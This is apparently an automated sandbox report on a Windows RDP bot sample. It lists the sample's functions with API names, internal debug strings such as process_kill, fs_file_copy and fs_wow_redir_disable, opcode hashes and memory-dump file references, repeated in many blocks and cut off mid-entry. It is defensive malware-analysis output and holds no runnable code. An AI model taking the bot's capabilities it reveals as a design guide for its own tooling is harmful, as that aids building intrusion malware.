    • API String ID: 1211020085-2360327764
    • Opcode ID: b1245428639a818b82b57766b3220211cd31ffdae2aaeb4b2527d5ebe8a7e941
    • Instruction ID: fbd8f99c954c1b88dcdf3c9f5bbc29f650b32429ded538b17be028cecf22f7c2
    • Opcode Fuzzy Hash: b1245428639a818b82b57766b3220211cd31ffdae2aaeb4b2527d5ebe8a7e941
    • Instruction Fuzzy Hash: F211E91DA0C303B6FA6D7751A482376A270EF05785FC408B5CC4E0B7A5DE2DE845B261
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
    • API String ID: 1211020085-2360327764
    • Opcode ID: 158e3072149725f4866144d657acd337f157539e64c9481685aa8a83708855ce
    • Instruction ID: aee525ddac7397fa84175a6375fd051c09332fb4320cc8a556b7424bc29c6887
    • Opcode Fuzzy Hash: 158e3072149725f4866144d657acd337f157539e64c9481685aa8a83708855ce
    • Instruction Fuzzy Hash: DD11E91DA0C303B6FA6C7751A482376E270EF05785FC408B5CC4E0B7A5DE2DE845B261
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
    • API String ID: 1211020085-2360327764
    • Opcode ID: 36bab34cf3439416bff648658dde056435f9cae3978658a94be91aff7a9a2503
    • Instruction ID: 199b26515d3d2baf6172ec184a6f7481a7f406386dcea544b3b01f8a2d7afbe4
    • Opcode Fuzzy Hash: 36bab34cf3439416bff648658dde056435f9cae3978658a94be91aff7a9a2503
    • Instruction Fuzzy Hash: 8C11E91DB0C303B6FA6C7751A482376A270EF05785FC408B5CC4E0B7A6DE2DE845B261
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: CloseErrorHandleLastProcess$NextOpenProcess32Terminatestrcmp
    • String ID: $[E] (%s) -> TerminateProcess failed(gle=%lu)$process_kill
    • API String ID: 1211020085-2360327764
    • Opcode ID: 022af13b32673e7725de95f25d7589f36e6619db3304b5fbefa396f0543736b4
    • Instruction ID: be6c00f94e8596c40c88d0947b2bdad70d6014b844b7a99d704e30f71295fcf5
    • Opcode Fuzzy Hash: 022af13b32673e7725de95f25d7589f36e6619db3304b5fbefa396f0543736b4
    • Instruction Fuzzy Hash: 3011E91DA0C303B6FA6C7751A482376A270EF05785FC408B5CC4E077A5DE2DE845B361
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: CopyErrorFileLastfflushfwrite
    • String ID: NULL$[E] (%s) -> CopyFileA failed(src=%s,dst=%s,overwrite=%d,gle=%lu)$[E] (%s) -> Failed(src=%s,dst=%s,overwrite=%d,err=%08x)$[I] (%s) -> Done(src=%s,dst=%s,overwrite=%d)$fs_file_copy
    • API String ID: 2887799713-3464183404
    • Opcode ID: 6ead6bd289564871cbad772da89ece984a2fa5525156020147c622fda4dc3193
    • Instruction ID: 81529eff32bf9f5508c05ece1cbe294afb71bed7ef60be063e80b16388604b8c
    • Opcode Fuzzy Hash: 6ead6bd289564871cbad772da89ece984a2fa5525156020147c622fda4dc3193
    • Instruction Fuzzy Hash: 74418C5D90D717A1FA246706A802379E7607F10BC8ED815B2C94F477E4EEACE681A721
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: DeleteErrorFileLast
    • String ID: NULL$[E] (%s) -> DeleteFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[I] (%s) -> Done(path=%s)$fs_file_delete
    • API String ID: 2018770650-4119452840
    • Opcode ID: 1af045b31d5d25f860d1e91a01d5b1170999442159eac2899485bddb971ebc89
    • Instruction ID: aad4426b76feab93594afa9ca6be563b11b789825fe62733283a0ace7ff3b3f6
    • Opcode Fuzzy Hash: 1af045b31d5d25f860d1e91a01d5b1170999442159eac2899485bddb971ebc89
    • Instruction Fuzzy Hash: FA317F5DE4CF0BB1FA347705A6423B8E2605FA5742ED549B2CA5E072D1ED1CE882B332
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: strlen
    • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
    • API String ID: 39653677-892027187
    • Opcode ID: a013a8a5a94643a489f30f4012283d97676f0be25172f8c4c2e0530956782a92
    • Instruction ID: c3dde3739b9240d407ee48a7e0fc7c6b79a0b6261a2840084d8029fc60403841
    • Opcode Fuzzy Hash: a013a8a5a94643a489f30f4012283d97676f0be25172f8c4c2e0530956782a92
    • Instruction Fuzzy Hash: 26510159F0A793B5FA25BA16A9167B596727F12788FC404B2D94E0B3D0DF2CE901A320
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: strlen$strcat
    • String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file
    • API String ID: 2335785903-2423714266
    • Opcode ID: 83d82f4d3edec64fe81c16d1b10e2db1f34f9444059a02a730a7ec5d1454eb3f
    • Instruction ID: c5237a0ce71fc9e5a1c53a4af004436db0d111e57cff8c8bbd377001e207fa51
    • Opcode Fuzzy Hash: 83d82f4d3edec64fe81c16d1b10e2db1f34f9444059a02a730a7ec5d1454eb3f
    • Instruction Fuzzy Hash: B911D369B08B4365FE55BF1698167F5E6A15F15784FCC48B0DE8E0B382EE3CD401A360
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: fwprintf$strlen
    • String ID: %*.*S$%-*.*S$%.*S
    • API String ID: 2636243462-2115465065
    • Opcode ID: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
    • Instruction ID: 535268d9f6497099e751951f5dac209ecc796e4ced873b9fbd01e02333e58d1b
    • Opcode Fuzzy Hash: 32549ed93d4336b5084efa2f50b5c29187e804bb01ab93832d870b3eedf07b11
    • Instruction Fuzzy Hash: 7631D86AF1834396F750BF17980A57EE2A0EB48B94F84C1B1DD5D8B785DE3CE402A720
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: AddressErrorLastLibraryLoadProc
    • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
    • API String ID: 3511525774-1584720945
    • Opcode ID: 29032d2e412322b7012e75e3eb2c96c128202e635fb7dffd687a4305b13bbcd5
    • Instruction ID: d1bf49dbec15c3fe6b1176242aec8c5e72d5f3ec97223e9db0ff16e832794388
    • Opcode Fuzzy Hash: 29032d2e412322b7012e75e3eb2c96c128202e635fb7dffd687a4305b13bbcd5
    • Instruction Fuzzy Hash: 7A11E56DF0CB43B1FB14B716A8833F4E261AF10344FD00AB5D49E466A1EEACE548E721
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
    • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
    • API String ID: 1533789296-1853374401
    • Opcode ID: 080ad7bc366025a3089ec555cad0c89bfd8f82290c6afcc84d692de1d3857fa3
    • Instruction ID: 3b3d61b38be63bc5ab8b97ab79db38a116f0b2e1b975810f2bae5c3e6909e836
    • Opcode Fuzzy Hash: 080ad7bc366025a3089ec555cad0c89bfd8f82290c6afcc84d692de1d3857fa3
    • Instruction Fuzzy Hash: 5701D76DE08A43B1FB11BB16A8823F4D260AF04344FD00AB5C09E466A1EF6DE949F721
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID: (pi != NULL)$C:/Projects/rdp/bot/codebase/process.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$process_free
    • API String ID: 2962429428-1801624891
    • Opcode ID: 12a4ad33b94f59e2d35f31c4cd6cc09bd18029f5dc8a1f5724eea2af5869da8b
    • Instruction ID: c62c82afc3c86d21a0e44b57ac613c8a2ffef86068263febcef14c3ee91a52ab
    • Opcode Fuzzy Hash: 12a4ad33b94f59e2d35f31c4cd6cc09bd18029f5dc8a1f5724eea2af5869da8b
    • Instruction Fuzzy Hash: DFF08269A0855BA0FA14FB12EC121B99320FF44344FC80972D94D47664DE3CD942E320
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: DeviceErrorLastQuery
    • String ID: %S%S$[E] (%s) -> QueryDosDeviceW failed(gle=%lu)$path_convert_to_nt
    • API String ID: 963133057-3473575966
    • Opcode ID: c996426b9d41c6d35987dbf9260498d4bde78d65dd98a9a6a52ba82241d016f5
    • Instruction ID: cff11cd2b79d9e0327aa3f69e7b4503414fba9479a3fff4ef3db834ef3d56c12
    • Opcode Fuzzy Hash: c996426b9d41c6d35987dbf9260498d4bde78d65dd98a9a6a52ba82241d016f5
    • Instruction Fuzzy Hash: 3341921AE0E757A2FB30761494523B9D2719F42794F9500B2DD8E1B7C5DE2CEC80B3A1
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: fwprintf
    • String ID: %*.*s$%-*.*s$%.*s$%S%S
    • API String ID: 968622242-2451587232
    • Opcode ID: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
    • Instruction ID: 2f805ae0542b1e1a53399df9f1a8c1f0ed83530d8c49ab0a4a60a7a8367b90d2
    • Opcode Fuzzy Hash: 468559d8ff67cbcfa5856c3651045b367068e2c3b874db09ef0e64f953addd24
    • Instruction Fuzzy Hash: 2531DC7EF0870355F7606A26880A57AEBA0EF4CB94F84C171DA5D8B684DE2CE412A720
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: CriticalDeleteSectionfclose
    • String ID: Done$[I] (%s) -> %s$debug_cleanup
    • API String ID: 3387974148-4247581856
    • Opcode ID: 6caffc1d6df5e181b95bedd39bed0003f3bec221b2616f58556cd0866e05cbfa
    • Instruction ID: b3fcfd42d309c4abe89e714f6bd70eb3eaa5ee41c0b8584bf5e10702f9952906
    • Opcode Fuzzy Hash: 6caffc1d6df5e181b95bedd39bed0003f3bec221b2616f58556cd0866e05cbfa
    • Instruction Fuzzy Hash: 88F0E22CA49643B8FB08BB52E85B371A361AF40344FC41AB5C08E462A1CF7DF049E760
    APIs
    • VirtualProtect.KERNEL32(?,?,00007FF73AFCA1E8,00000000,?,?,?,00007FF73AFCA1E0,00007FF73AFB1208,?,?,?,00007FF73AFB1313), ref: 00007FF73AFBABC2
    Strings
    • Unknown pseudo relocation protocol version %d., xrefs: 00007FF73AFBAA62
    • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF73AFBAB5D
    • Unknown pseudo relocation bit size %d., xrefs: 00007FF73AFBAAEB
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: ProtectVirtual
    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
    • API String ID: 544645111-1286557213
    • Opcode ID: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
    • Instruction ID: 13a24f1c4f14e01848188d749e117911b19c0c512aadfa91463bc4283afed161
    • Opcode Fuzzy Hash: a66f9ddc854b527654f3001909f1cb736110354a96681d0a13771c5c9f7ebb02
    • Instruction Fuzzy Hash: CA61AF29F08743E6FB20BB16D5422B8ABB5AB44B94F8482B1C91D437D5DE3CE581E720
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: ErrorHandleLastModule
    • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
    • API String ID: 4242514867-2427012484
    • Opcode ID: 5d5017756388f0c44f81d69e3be0139bb16f70aafb5da82e5f439a8c0ba099b7
    • Instruction ID: 67ae60e9bc63c75b81b89746f9d48b30b06ef04c2e860c71455f1c2cb6056fe5
    • Opcode Fuzzy Hash: 5d5017756388f0c44f81d69e3be0139bb16f70aafb5da82e5f439a8c0ba099b7
    • Instruction Fuzzy Hash: 52F0302DA08743A0F720BB55E4423AAA770EB44398FD40571C58E036B4CE3CD149E724
    APIs
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778544603.00007FF73AFCF000.00000002.00000001.01000000.00000004.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_2_7ff73afb0000_3lp16vmh8u8y3z1y6.jbxd
    Similarity
    • API ID: Byte$CharMultiWide$Lead_errno
    • String ID:
    • API String ID: 2766522060-0
    • Opcode ID: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
    • Instruction ID: 06a72a5064c4eb3aa6cf0ab95af39bd40749348e3f9f76a23fe9be256fcb9bb5
    • Opcode Fuzzy Hash: b7e47614b01a7040d6e60f2510ffabcfe71ed503a462e64265e5097d757dc550
    • Instruction Fuzzy Hash: B7310A7AA0C2835BF7306F22D4413B9EA90AB85788F844575EACC437C5DF3DD446AB20
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.1778348142.00007FF73AFB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF73AFB0000, based on PE: true
    • Associated: 00000005.00000002.1778327598.00007FF73AFB0000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778373713.00007FF73AFC1000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778492462.00007FF73AFC2000.00000002.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778510509.00007FF73AFCA000.00000004.00000001.01000000.00000004.sdmpDownload File
    • Associated: 00000005.00000002.1778528830.00007FF73AFCC000.00000008.00000001.01000000.00000004.sdmpDownload File
